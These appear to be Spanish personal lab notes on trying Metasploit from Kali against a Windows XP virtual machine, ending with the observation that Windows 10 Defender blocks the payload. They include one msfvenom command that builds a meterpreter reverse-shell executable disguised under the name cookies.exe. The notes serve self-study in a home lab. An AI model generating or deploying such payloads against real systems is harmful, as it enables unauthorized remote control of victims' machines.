1.06.2020 Metasploit https://metasploit.com/ Viene integrado con kali linux Tal vez su uso sea para probar la seguridad de un sitio, o encontrar todas sus debilidades. https://www.exploit-db.com/ IP: anfitrión (kali, donde está instalado metasploit) 192.168.56.1:36489 IP de la máquina atacada: nmap 192.168.56.102:4444 ------------------ MacOS | ------------ | VirtualBox | | --------- | | ------- Windows | | | | | XP | | |-----------------| Kali | --------- | | | | ------------ | ------- ------------------ XP instalado como dice este artículo: https://www.makeuseof.com/tag/download-windows-xp-for-free-and-legally-straight-from-microsoft-si/ Una hazaña creada con metasploit: msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.14 -f exe -o cookies.exe El archivo cookies.exe no puede ejecutarse en Windows 10 (ver figura CopiaArchivoExe.pdf). El letraro que sale al intentar copiar (o ejecutar) el archivo es: "Error 0x800700E1 No se pudo completar la operación porque el archivo contiene un virus o software potencialmente no deseado" En Windows 10 existe un proceso que checa el malware en tiempo de execución (ver figura Administradordetareas.pdf), llama "Antimalware Service Executable" que detecta el código malicioso de metasploit.